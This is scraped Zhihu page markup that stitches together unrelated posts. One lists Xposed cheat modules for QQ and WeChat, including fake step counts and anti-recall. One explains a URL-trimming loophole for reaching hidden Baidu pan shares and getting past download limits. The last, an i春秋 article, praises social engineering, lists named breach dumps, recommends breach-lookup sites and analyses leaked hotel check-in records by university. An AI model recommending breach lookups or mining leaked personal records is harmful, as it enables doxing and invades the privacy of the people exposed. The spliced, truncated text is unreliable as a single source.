data-original=&https://pic4.zhimg.com/50/v2-da64ffb5aae4_r.jpg&&&/figure&&p&如下图所示,勾选要启用的模块(原谅我MI6玩不起xposed,不能演示。。。)&/p&&figure&&img src=&https://pic4.zhimg.com/50/v2-6e22f3b9c_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic4.zhimg.com/50/v2-6e22f3b9c_r.jpg&&&/figure&&p&&br&&/p&&h2&1.QQ机器人&/h2&&p&emmm.....大家都知道,最近小冰和babyQ因为某些言论被拉去调教了。&/p&&p&图灵机器人暂时还没翻车。&/p&&p&可以用这个app接上&b&图灵机器人&/b&,拉进群里↓&/p&&figure&&img src=&https://pic3.zhimg.com/50/v2-dbb8ce7895_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic3.zhimg.com/50/v2-dbb8ce7895_r.jpg&&&/figure&&p&机器人开着的时候,我们在后台也能回复消息,假装某条消息是机器人发的~&/p&&p&总之~玩法很多,不过要记得用QQ小号开机器人(别问我怎么知道的)&/p&&blockquote&“你真的是机器人?”&/blockquote&&p&&br&&/p&&h2&2.运动修改器&/h2&&p&能修改QQ、微信运动的步数&/p&&figure&&img src=&https://pic4.zhimg.com/50/v2-6fd317df5cdbc0a4814d_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&610& data-rawheight=&202& class=&origin_image zh-lightbox-thumb& width=&610& data-original=&https://pic4.zhimg.com/50/v2-6fd317df5cdbc0a4814d_r.jpg&&&/figure&&p&虽然说不太好。。。&/p&&blockquote&“你把手机绑在狗身上了吧?”&/blockquote&&p&&br&&/p&&h2&3.微信防撤回&/h2&&p&抱歉没图。。。&/p&&p&可以看到别人撤回的信息&/p&&blockquote&“我都撤回了你怎么看到的?”&/blockquote&&p&&br&&/p&&p&&br&&/p&&h2&4.QQHook&/h2&&figure&&img src=&https://pic3.zhimg.com/50/v2-1bf24bce342_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1280& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic3.zhimg.com/50/v2-1bf24bce342_r.jpg&&&/figure&&p&QQ的一些高级操作,包括防撤回&/p&&blockquote&“还有这种操作?”&/blockquote&&p&&b&下载地址&/b&:&/p&&p&链接:&a href=&//link.zhihu.com/?target=http%3A//pan.baidu.com/s/1gfzjHtD& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&pan.baidu.com/s/1gfzjHt&/span&&span class=&invisible&&D&/span&&span class=&ellipsis&&&/span&&/a&
密码:4uvk&/p&&p&里面的&b&xposed专用&/b&文件夹&/p&&p&&br&&/p&&h2&5.QQSendPoke&/h2&&p&解除QQ戳一戳次数的限制&/p&&blockquote&“我流量都被你耗光了呐!”&/blockquote&&p&&br&&/p&&p&&br&&/p&&p&6.xMIUI&/p&&figure&&img src=&https://pic3.zhimg.com/50/v2-eb41b1dc6ffe51e1acd8b_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1280& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic3.zhimg.com/50/v2-eb41b1dc6ffe51e1acd8b_r.jpg&&&/figure&&p&&br&&/p&&p&MIUI的小伙伴可以试试,很多系统的个性化定制&/p&&p&&br&&/p&&p&&br&&/p&&p&———分割线———&/p&&p&&br&&/p&&p&今天的早些时候,这篇文章曾经被知乎封过,Mark一下&/p&&p&&感谢评论区大家的关心&/p&&figure&&img src=&https://pic4.zhimg.com/50/v2-ec20ebf95a4_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic4.zhimg.com/50/v2-ec20ebf95a4_r.jpg&&&/figure&&p&&br&&/p&&p&&br&&/p&&p&———又一条分割线———&/p&&p&关于&b&妮媌&/b&这个app,我的观点是,评判一个app的标准主要还是好不好用。&/p&&p&个人觉得挺好用的,尤其是解除MIUI的root的25秒 :)&/p&&figure&&img src=&https://pic3.zhimg.com/50/v2-cff3bbd57cf2c8a06e0a2_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&2505& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic3.zhimg.com/50/v2-cff3bbd57cf2c8a06e0a2_r.jpg&&&/figure&&p&&br&&/p&&figure&&img src=&https://pic2.zhimg.com/50/v2-313addebbacbaac8f192ec1_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic2.zhimg.com/50/v2-313addebbacbaac8f192ec1_r.jpg&&&/figure&&p&作者在评论区的留言:&/p&&figure&&img src=&https://pic4.zhimg.com/50/v2-42bdeb7cdce7ef60af09b6a_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&2102& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic4.zhimg.com/50/v2-42bdeb7cdce7ef60af09b6a_r.jpg&&&/figure&&p&&a class=&member_mention& href=&//www.zhihu.com/people/efcf5fee3c40db96fcaf8d& data-hash=&efcf5fee3c40db96fcaf8d& data-hovercard=&p$b$efcf5fee3c40db96fcaf8d&&@妮哩萌萌&/a& &/p&&p&在之前的&b&下载地址&/b&里也有这个app。&/p&&p&&br&&/p&&p&&br&&/p&&p&求给个赞~&/p&&p&还有一大波&b&逆天&/b&的app正在编辑中~&/p&&p&&br&&/p&&p&我的网站: &b&&a href=&//link.zhihu.com/?target=http%3A//radiationstu.cn/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&辐射工作站&/a&&/b&&/p&&p&个人微信: &b&linyuxuanlin&/b&&/p&&p&有兴趣可以加我微信,一起交流讨论~&/p&
5月13日更新:新增 RE文件管理器、全面屏手势、Syslock、Sky Mi、FastMiui、八戒助手&唐僧藏经如何强制开启小米手机的全面屏手势(对于非全面屏手机)?推荐
的回答4月1日更新:所有的 app 均可在
点击 app 名称直接下载,不用…
&p&【方法】&b&在百度搜索栏里输入「资料名+空格+pan」&/b&。&br&&/p&&br&&br&&i&只想找到资源的话,看到这就够了。&/i&&br&&i&突破速度限制的方法在第二部分,请下拉。&/i&&br&&br&&p&- - - - - - - - - - - - - - - - - - - -&br&&/p&&br&&p&「用网盘搜资料」,大概可以分解成两个步骤——&/p&&blockquote&第一步:定位——找到资料 &br&第二步:下载——把资料拖到本地&/blockquote&&br&&p&【第一步:关于如何在baidu云上找到资料】&br&&/p&&p&个人体验,主要有两种方法:&/p&&blockquote&&p&1. 修正版site法(利用url中的一个漏洞)&/p&&p&2. &b&搭便车法(利用百度知道)&/b&&/p&&/blockquote&&br&- - - - - - - - - - - - - - - - - - - - - - - &br&&br&&p&&b& 1. 修正版site:&a href=&//link.zhihu.com/?target=http%3A//pan.baidu.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&pan.baidu.com&/span&&span class=&invisible&&&/span&&/a&法(以下简称site法)&/b&&br&&/p&&br&&p&不得不说,近来site法效果越来越差——&/p&&blockquote&①检索时,显示条目剧减&p&②点击条目后,页面无法显示的情形激增&/p&&/blockquote&&p&①&b&检索时&/b&-候选条目变少甚至消失的&b&解决方法:&/b&&/p&&p& A. 将site:&a href=&//link.zhihu.com/?target=http%3A//pan.baidu.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&pan.baidu.com&/span&&span class=&invisible&&&/span&&/a&中的&b&pan改成yun&/b&&/p&&p& 据个人观察,百度用来隐藏资源的机制,在&a href=&//link.zhihu.com/?target=http%3A//pan.baidu.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&pan.baidu.com&/span&&span class=&invisible&&&/span&&/a&与&a href=&//link.zhihu.com/?target=http%3A//yun.baidu.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&yun.baidu.com&/span&&span class=&invisible&&&/span&&/a&上并未实现完全同步,找不到时可以分别尝试。。&/p&&p& B. &b&换搜索引擎。(bing、yahoo, etc)&/b&&/p&&p& 大约半年前,使用site法在&a href=&//link.zhihu.com/?target=http%3A//google.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&google.com&/span&&span class=&invisible&&&/span&&/a&搜到的内容的种类是大于&a href=&//link.zhihu.com/?target=http%3A//google.jp& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&google.jp&/span&&span class=&invisible&&&/span&&/a&的,但近来完全google各分站下内容完全一致。改google后缀失效,需要更彻底地改引擎。&/p&&br&&p&②&b&检索后&/b&&b&-&/b&候选条目打开后显示「访问页面不存在」或「分享的文件已经被取消了」。&/p&&p&&b& 对于「访问页面不存在」&/b&:可以抢救——曾经找到个漏洞,在这里分享给大家——&/p&&p&不知道是baidu的程序员偷懒,还是一一封锁成本太大,百度只是隐藏了分享后的资源显示,原分享只要未被删除,通过简单的url修改,还是可以access到原资料的。&/p&&p& 姑且叫它&b&「删除&法」&/b&。&br&&/p&&p& 以三国演义为例,搜索后,只有两个条目,&/p&&figure&&img src=&https://pic4.zhimg.com/50/v2-071ffe5d8b7fd326c6b92a_b.jpg& data-rawwidth=&489& data-rawheight=&249& class=&origin_image zh-lightbox-thumb& width=&489& data-original=&https://pic4.zhimg.com/50/v2-071ffe5d8b7fd326c6b92a_r.jpg&&&/figure&&p& 点开第一个link,出现了恼人的「访问页面不存在」。&/p&&figure&&img src=&https://pic2.zhimg.com/50/v2-4a0dfe73dcf_b.jpg& data-rawwidth=&600& data-rawheight=&340& class=&origin_image zh-lightbox-thumb& width=&600& data-original=&https://pic2.zhimg.com/50/v2-4a0dfe73dcf_r.jpg&&&/figure&&p&不要急。&br&&/p&&p&这时候,点开顶部的地址栏,拉到最右方,可以看到,整个url可以分成几个部分,每个部分由「&」连接。&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-cba79ff6a71_b.jpg& data-rawwidth=&554& data-rawheight=&14& class=&origin_image zh-lightbox-thumb& width=&554& data-original=&https://pic1.zhimg.com/50/v2-cba79ff6a71_r.jpg&&&/figure&&p&&b&所有的「&」,都是病灶。&/b&&/p&&p&试着&b&删掉最右侧的一个&/b&&b&「&」&/b&&b&及其右侧内容&/b&,然后敲回车,奇迹发生了 =w=&br&&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-ca6d776cfbc_b.jpg& data-rawwidth=&537& data-rawheight=&187& class=&origin_image zh-lightbox-thumb& width=&537& data-original=&https://pic1.zhimg.com/50/v2-ca6d776cfbc_r.jpg&&&/figure&&br&&p&没有错,只要把本来的网址中的「&page=1」删掉,&/p&&p&从 &a href=&//link.zhihu.com/?target=https%3A//pan.baidu.com/wap/link%3Fshareid%3D%26uk%3D%26third%3D0%26dir%3D%252F%25E5%25A4%25AE%25E8%25A7%%E5%259B%259B%25E5%25A4%25A7%25E5%E8%E7%%25E8%25A7%%%25E5%E9%259B%5BDVD9%25E5%258E%259F%25E7%259B%page%3D1& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&pan.baidu.com/wap/link?&/span&&span class=&invisible&&shareid=&uk=&third=0&dir=%2F%E5%A4%AE%E8%A7%86%E7%89%88%E5%9B%9B%E5%A4%A7%E5%90%8D%E8%91%97%E7%94%B5%E8%A7%86%E5%89%A7%E5%90%88%E9%9B%86%20%5BDVD9%E5%8E%9F%E7%9B%98%5D&page=1&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&变成&/p&&p&&a href=&//link.zhihu.com/?target=https%3A//pan.baidu.com/wap/link%3Fshareid%3D%26uk%3D%26third%3D0%26dir%3D%252F%25E5%25A4%25AE%25E8%25A7%%E5%259B%259B%25E5%25A4%25A7%25E5%E8%E7%%25E8%25A7%%%25E5%E9%259B%5BDVD9%25E5%258E%259F%25E7%259B%D& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&pan.baidu.com/wap/link?&/span&&span class=&invisible&&shareid=&uk=&third=0&dir=%2F%E5%A4%AE%E8%A7%86%E7%89%88%E5%9B%9B%E5%A4%A7%E5%90%8D%E8%91%97%E7%94%B5%E8%A7%86%E5%89%A7%E5%90%88%E9%9B%86%20%5BDVD9%E5%8E%9F%E7%9B%98%5D&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&资料就恢复健康了!&/p&&p&(如果仍然显示「访问页面不存在」,继续从右侧开始删除到下一个「&」。)&br&&/p&&br&有时候,用「删除&法」后网页会显示「你来晚了,分享的文件已经被取消了,下次要早点哟」,这表示初始分享者彻底取消了分享——&br&&p&&b&对于「分享的文件已经被取消了」的文件&/b&,试试下面的方法2。&/p&&br&&br&&p&&b&★★2. 搭便车-百度知道法(推荐)&/b&&/p&&br&&p&鉴于中国广大的人口基数,相当部分的资料,都有人尝试找过。&br&&/p&&p&而且,大多数尝试的痕迹现在仍然被保存在「百度知道」、「百度贴吧」上。&/p&&br&&p&同时,由于是自家服务,「百度知道」、「百度贴吧」天然被赋予了更高权重、出现在了搜索页更靠前的位置。&/p&&p&因此,并不需要在搜索词里添加诸如「baidu」的内容,也能获得我们需要的搜索结果。&/p&&p&把这些提问结果检索出来,绝大多数情况下,可以获得比使用site法更好的搜索体验。&/p&&br&&p&&b&使用方法,非常简单&/b&——&/p&&p&直接在百度搜索栏里输入「资料名+空格+pan」。&/p&&br&&p&依然以三国演义为例,&/p&&figure&&img src=&https://pic3.zhimg.com/50/v2-d1b27d85bd199c7e99a9c_b.jpg& data-rawwidth=&390& data-rawheight=&323& class=&content_image& width=&390&&&/figure&&p&首页10条结果,有8条给了百度云链接。&/p&&p&大多数链接可以直接打开;其余部分中的大部分,结合上文提及的「删&法」,可以正常打开。&/p&&br&&p&&b&这是一种&/b&&/p&&p&&b&①&/b&&b&没有利用任何漏洞因而不可能被封锁的&/b&&/p&&p&&b&②极为简单的&/b&&/p&&p&&b&③效率远超「site法」的&/b&&/p&&p&&b&资料寻找方法,强烈推荐大家使用。&/b&&/p&&br&&p&- - - - - - - - - - - - - - - - - - - - - - -&/p&&p&由于百度的限制,如何将文件快速下载到本地,是接下来需要解决的问题。&/p&&br&&p&【二、关于如何把资料保存到本地】&br&&/p&&p&推荐使用Aria2。&/p&&p&具体方法如下——&/p&&p&&b&1. 配置chrome端(安装Exporter)&/b&&/p&&p&&b&#该步骤意义&/b&&/p&&p&在网页端生成适合Aria2下载器使用的链接。&/p&&p&&b&# 操作方法&/b&&/p&&p&1.1 下载下列文件&/p&&p&&a href=&//link.zhihu.com/?target=https%3A//codeload.github.com/acgotaku/BaiduExporter/zip/master& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&codeload.github.com/acg&/span&&span class=&invisible&&otaku/BaiduExporter/zip/master&/span&&span class=&ellipsis&&&/span&&/a&&br&&/p&&p&1.2 解压红框中文件夹。&/p&&figure&&img src=&https://pic2.zhimg.com/50/v2-91e5194cf2accdc439b41d1b_b.jpg& data-rawwidth=&745& data-rawheight=&706& class=&origin_image zh-lightbox-thumb& width=&745& data-original=&https://pic2.zhimg.com/50/v2-91e5194cf2accdc439b41d1b_r.jpg&&&/figure&&br&&p&1.3 打开chrome,依次点击&/p&&blockquote&Settings -& Extensions -& Check Developer mode-& Load unpacked extension&/blockquote&&p&选中刚刚解压的chrome文件。&br&&/p&&b&#安装完毕标志&/b&&br&打开任意文件时,出现下列大红框中按钮。&br&&figure&&img src=&https://pic4.zhimg.com/50/v2-9a39a470ef2_b.jpg& data-rawwidth=&612& data-rawheight=&327& class=&origin_image zh-lightbox-thumb& width=&612& data-original=&https://pic4.zhimg.com/50/v2-9a39a470ef2_r.jpg&&&/figure&&br&&br&&p&&b&2. 配置OS端&/b&&/p&&p&&b&2.1 Windows OS下&/b&&/p&&p&#该步骤意义&/p&&p&Aria2是类似于迅雷、百度云管家的下载器。因此,需要①提前安装、②下载时保持运行。&/p&&p&&b&该步骤为的是安装Aria2。&/b&&/p&&p&&b&2.1.1 本地Aria2下载器(软件)配置&/b&&/p&&p&下载如下文件&/p&&p&&a href=&//link.zhihu.com/?target=https%3A//www.jianguoyun.com/p/DQNDOmEQmnsYnPYk& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Aria2下载器&/a&&br&&/p&&p&解压后,将文件夹放入C:\Program File中,双击任意红圈中文件,即可打开Aria。&/p&&p&打开Aria2c.exe后,会在右下角出现客户端icon——这对我们并没有什么用,网页端客户端更为美观。&/p&&p&建议打开HideRun.vbs,使得Aria2后台运行。&/p&&br&&figure&&img src=&https://pic3.zhimg.com/50/v2-184da5fde68d12d_b.jpg& data-rawwidth=&618& data-rawheight=&362& class=&origin_image zh-lightbox-thumb& width=&618& data-original=&https://pic3.zhimg.com/50/v2-184da5fde68d12d_r.jpg&&&/figure&&br&&br&&p&&b&2.1.2 具体文件下载方法&/b&&/p&&p&需要下载某资源时,等待网页完全载入后,点击网页中如下图红圈中位置,开始下载。&/p&&p&默认下载地址为C:\Stuff。&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-9d04b2c0e0d947cb6b7db_b.jpg& data-rawwidth=&765& data-rawheight=&424& class=&origin_image zh-lightbox-thumb& width=&765& data-original=&https://pic1.zhimg.com/50/v2-9d04b2c0e0d947cb6b7db_r.jpg&&&/figure&&p&#下载项管理(网页端客户端)&/p&&p&戳下面这个网页——&/p&&p&&a href=&//link.zhihu.com/?target=http%3A//yaaw.ghostry.cn/%23%23%23& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Yet Another Aria2 Web Frontend&/a&&br&&/p&&p&可能已经习惯了通过本地客户端——迅雷、百度云——管理下载项。&/p&请把&b&上面这个网页想象成迅雷客户端&/b&。&br&但这个网页只是一层皮,关闭上文提到的网页并不会中止下载——并不需要时刻开着chrome。&br&真正运行着的,是2.1.1中提到的Aria2下载器。&br&&br&&br&&p&&b&2.2 MacOS下&/b&&/p&&p&&b&2.2.1 本地配置与客户端&/b&&/p&&p&点下面的url下载dmg文件并安装。&br&&/p&&p&&a href=&//link.zhihu.com/?target=https%3A//github-cloud.s3.amazonaws.com/releases/ccd420-c320-11e6-9a66-9d253c8af955.dmg%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DAKIAISTNZFOVBIJMK3TQ%252FFus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D052Z%26X-Amz-Expires%3D300%26X-Amz-Signature%3Dbcf6f448939fddd9ec1ee032e0e630ead866e9d721cd3e66f3c9%26X-Amz-SignedHeaders%3Dhost%26actor_id%3D0%26response-content-disposition%3Dattachment%253B%2520filename%253Daria2-1.30.0-osx-darwin.dmg%26response-content-type%3Dapplication%252Foctet-stream& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Aria2 GUI&/a&&br&&/p&&p&&b&2.2.2 具体文件下载方法&/b&&br&&/p&&p&保持Aria2 GUI客户端打开,打开某资源的网页,待网页完全载入后,点击网页中如下图红圈中位置,开始下载。&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-9d04b2c0e0d947cb6b7db_b.jpg& data-rawwidth=&765& data-rawheight=&424& class=&origin_image zh-lightbox-thumb& width=&765& data-original=&https://pic1.zhimg.com/50/v2-9d04b2c0e0d947cb6b7db_r.jpg&&&/figure&&br&&br&-------------------------------------------------------&br&&p&更详细配置方法,请参考以下网页。&/p&&a href=&//link.zhihu.com/?target=http%3A//aria2c.com/usage.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Aria2 & YAAW 使用说明&/a&&br&&br&&p&&b&#Ps.&/b& &/p&&p&上文提及方法,并不存在什么被大规模封禁的可能性。
有用的话,请放心地点赞 w&/p&&p&有余力的话,不妨买上几个月百度网盘的会员,支持一下这项服务。&/p&&p&希望可以一直用下去。&/p&
【方法】在百度搜索栏里输入「资料名+空格+pan」。 只想找到资源的话,看到这就够了。 突破速度限制的方法在第二部分,请下拉。 - - - - - - - - - - - - - - - - - - - - 「用网盘搜资料」,大概可以分解成两个步骤——第一步:定位——找到资料 第二步:…
&figure&&img src=&https://pic2.zhimg.com/v2-61fcdb41bf70a0ff4a41_b.jpg& data-rawwidth=&1003& data-rawheight=&283& class=&origin_image zh-lightbox-thumb& width=&1003& data-original=&https://pic2.zhimg.com/v2-61fcdb41bf70a0ff4a41_r.jpg&&&/figure&&blockquote&本文原创作者:夏之冰雪&br&内容来源:&a href=&http://link.zhihu.com/?target=http%3A//bbs.ichunqiu.com/portal.php%3Ffrom%3Dzhihu& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&i春秋社区&/a&&br&未经许可禁止转载&/blockquote&&p&&b&“社工库”&/b&这个词很多人 并不陌生,而且也有越来越多的新闻开始提及社工库,比如:&/p&&p&1. 2016年3月,江苏淮安公安机关网络安全保卫部门成功侦破一起侵犯公民个人信息案,抓获犯罪嫌疑人8名,捣毁国内最大的网络社工库“K8社工库”(&a href=&http://link.zhihu.com/?target=http%3A//www.k8sec.com& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&k8sec.com&/span&&span class=&invisible&&&/span&&/a&),查获公民个人信息20亿条。&/p&&p&2. 2016年12月,南都记者700元就买到同事行踪,包括乘机、开房、上网吧等11项记录,很多数据源自社工库。&/p&&p&社工库这个产业链一直很火爆,不过国家也在打击,搜索“社工库”,你会发现它是个敏感词。&/p&&p&&b&声明:请勿使用社工库从事非法事情,本篇文章仅提供学习讨论。&/b&&/p&&figure&&img src=&https://pic2.zhimg.com/v2-b4db04dffa79ecaa5faf0e_b.png& data-rawwidth=&749& data-rawheight=&292& class=&origin_image zh-lightbox-thumb& width=&749& data-original=&https://pic2.zhimg.com/v2-b4db04dffa79ecaa5faf0e_r.jpg&&&/figure&&h2&&ul&&li&&b&社会工程学&/b&&/li&&/ul&&/h2&&p&在谈社工库之前,我们先说说什么是社工(即社会工程学),有几个社会工程学的概念需要了解:&/p&&ol&&li&社会工程学攻击都建立在使人决断产生认知偏差的基础上,熟练的社会工程师都是擅长进行信息收集的身体力行者。&br&&/li&&li&社会工程学是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。&br&&/li&&li& 社会工程学是一种黑客攻击方法,利用欺骗等手段骗取对方信任,获取机密情报。&br&&/li&&li& 社会工程学是一种利用人性脆弱点、贪婪等等的心理表现进行攻击,是防不胜防的。&/li&&/ol&&p&社会工程学本来是一门学问,但是因为所做的事情大都是不好的,所以这个词慢慢变成了贬义词,甚至被认为“违背了人性的道德”。&/p&&br&&p&&b&i春秋社区有一篇帖子在讨论社会工程学:&/b&&/p&&p&&a href=&http://link.zhihu.com/?target=https%3A//bbs.ichunqiu.com/forum.php%3Fmod%3Dviewthread%26tid%3D19518%26fromuid%3D77972& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&你如何看待黑客的社会工程学?&/a&&/p&&p&我认为,高尚了说,社工是一门艺术,操纵人的艺术。如果说“违背了人性的道德”,那么很多家长哄骗小孩,利诱小孩,未尝不是一种“操纵人心”。社工无罪,问题在于攻击本身,如果是爱国、为了保护国家利益而使用社工进行攻击,社工肯定会被认为“高大上”。&/p&&p&在网络安全攻防研究中,我比较喜欢社会工程学、也比较敬畏社会工程学,相比于其他的常见攻击(比如sql注入),社会工程学有着其自身迷人之处:&/p&&p&&b&1. 情感&/b&&/p&&p&平时我们接触的更多的是基于理性的攻击,而社会工程学,我觉得起到的作用是感性攻击,。前者,黑客更偏重于智商和逻辑,后者更偏重于情商和阅历。最直接的例子,暗恋一个妹子,如何拿下她?不论怎么攻击,社工应该是必不可少的,情商越高,发挥社工的威力越大。&/p&&p&&b&2. 效率&/b&&/p&&p&和基于技术相比,社工在一些情况下,可以带来更犀利的攻击。比如,拿着常见密码暴力破解一个人的账号;可能速度不如搜集一下他的基本信息,破解来的更快。企业设计了多层安全防护,保护核心数据,需要一层层攻破;那么很可能装作一个受了委屈的用户来欺骗客服来获取权限,这种方式更有效。&/p&&p&&b&3. 可能性&/b&&/p&&p&人是复杂的,机器是01。攻击一台服务器,结果=攻击者的技能+服务器的弱点,结果早就注定。而社会工程学可以带来无限可能,今天成功,不代表明天也成功;攻击张三能成功,不代表攻击李四也能成功。就连攻击者本人,也是不确定性的,攻击者本身的状态,都可能会影响社工的成功与否。与服务器攻击相比,社工的不确定性,我觉得更具有艺术感。&/p&&br&&h2&&ul&&li&&b&社工库&/b&&br&&/li&&/ul&&br&&/h2&&p&&b&社工库,是社会工程学中所用到的数据库。&/b&&/p&&p&上面提到了,社会工程学的一个维度就是信息搜集,比如指定一个手机号,就能获取到这个手机号背后的主人信息,包括姓名、邮箱、身份证、籍贯、社交账号等等信息,这些信息就是社工库。&/p&&p&这些信息数据,少则几百万,多则上亿,主要来源是各大公司的安全漏洞,导致数据被黑客窃取。社工库是从2011年开始,呈现了爆发式增长,归其原因,这一年有大量的用户数据泄露。这是我得到的信息,2011年就有上亿数据泄露:&/p&&blockquote&&p&2011.03-多玩游戏网-800万-txt.rar&/p&&p&2011.03-织梦CMS官网数据库-34万-sql.zip&/p&&p&游戏网-12万-sql.rar&/p&&p&2011.04-IS语音-969万-txt.zip&/p&&p&2011.04-亚马逊中国买家信息-20万.zip&/p&&p&2011.04-凡客诚品买家信息-20万-Excel.zip&/p&&p&2011.04-当当网买家信息-101万-Excel.zip&/p&&p&2011.04-爱拍游戏网-1100万-txt.zip&/p&&p&2011.04-猴岛游戏社区-2683万-txt.rar&/p&&p&2011.05-上海市银行大额客户-21万-xls.rar&/p&&p&2011.05-木蚂蚁-13万-sql.zip&/p&&p&2011.07-土木在线-540万-sql.zip&/p&&p&游戏网-1000万-txt.rar&/p&&p&2011.10-CSDN.NET-600万-sql.rar&/p&&p&2011.10-嘟嘟牛-66277-txt.rar&/p&&p&k7k小游戏-2000万-txt.rar&/p&&p&2011.11-人人网-500万-txt.rar&/p&&p&2011.12-天涯社区-4000万-txt.rar&/p&&p&2011.12-淘宝买家卖家邮箱-2500万-txt.zip&/p&&/blockquote&&p&社工库的价值在于查询,如果拥有再多数据,而不能很好的查询,那么很难发挥其价值。所以市面上有很多做社工库查询的网站。之前出现了很多在线社工库查询网站,但由于“种种原因”,大部分都被关闭了。现在能够访问,大部分都需要翻墙使用,这里举几个例子:&/p&&p&&a href=&http://link.zhihu.com/?target=https%3A//qun.findmima.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&FINDMIMA密码网&/a&
---社工库更新较及时,涵盖账号、qq等多个维度&/p&&p&&a href=&http://link.zhihu.com/?target=https%3A//haveibeenpwned.com/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Have I been pwned? Check if your email has been compromised in a data breach&/a&
---国外知名社工库查询网站&/p&&p&&a href=&http://link.zhihu.com/?target=http%3A//s.70sec.com/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&s.70sec.com/&/span&&span class=&invisible&&&/span&&/a&
---收录数据超过300亿&/p&&figure&&img src=&https://pic3.zhimg.com/v2-8babc617da5edf2183c56_b.png& data-rawwidth=&452& data-rawheight=&437& class=&origin_image zh-lightbox-thumb& width=&452& data-original=&https://pic3.zhimg.com/v2-8babc617da5edf2183c56_r.jpg&&&/figure&&br&&h2&&ul&&li&&b&社工库价值&/b&&br&&/li&&/ul&&br&&/h2&&p&一说到社工库、信息泄露,大家都会比较头疼,比如千万级酒店开房数据泄露,导致了一些家庭矛盾、甚至离婚。&/p&&p&某个大型社工库网站进行过PV的调查,有个有趣的数据,仅供参考,不做任何结论:&/p&&ol&&li& 宝强离婚案期间,社工库搜索量是平时的5倍之多。&br&&/li&&li&过年前后,社工库搜索量是每年最少的时候。&br&&/li&&li&国家的一些固定会议期间,网站遭受攻击的次数会明显居多。&/li&&/ol&&p&社工库的查询信息,是大家最常见的使用方式,所以很多黑产做了收费的查询系统。除了信息查询,其实社工库还可以被用来做其它有价值的事情,比如对于一些被曝出的社工库,我们可以做数据分析。我们可以做很多有价值、有趣的事情。&/p&&p&对于千万级别开房数据,很多都记录了地址,经过采样分析很多大学生开房,登记的地址都是自己的学校名字:&/p&&blockquote&&p&上海市邯郸路220号复旦大学跃进楼&/p&&p&上海市邯郸路220号复旦大学生命科学学院&/p&&p&上海市武川路78弄(复旦大学北区学生公寓)&/p&&p&上海市邯郸路220号复旦大学物理楼&/p&&/blockquote&&figure&&img src=&https://pic4.zhimg.com/v2-3ea81e98efe3b_b.png& data-rawwidth=&996& data-rawheight=&390& class=&origin_image zh-lightbox-thumb& width=&996& data-original=&https://pic4.zhimg.com/v2-3ea81e98efe3b_r.jpg&&&/figure&&p&我们可以对地址进行分词,找到各个大学的数据,并进行统计。会发现,上海同济大学的学生开房比复旦大学的学生要多,而同济嘉定校区又比四平路校区多。嘉定校区是郊区,而四平路处于繁华市区,通过数据,可以这样认为,市区的学生生活更丰富,而郊区的学生更寂寞。和同济大学相比,复旦监管可能更严厉一些。作为老板,在同济投资一个平价宾馆,也许是一个不错的选择。等等。。。有趣吧~&/p&&p&&b&主要python工具:&/b&&/p&&blockquote&&p&pandas:数据收集,分析/清洗,内存处理,千万级以内的数据。 &/p&&p&matploylib,seaborn:用作可视化分析。 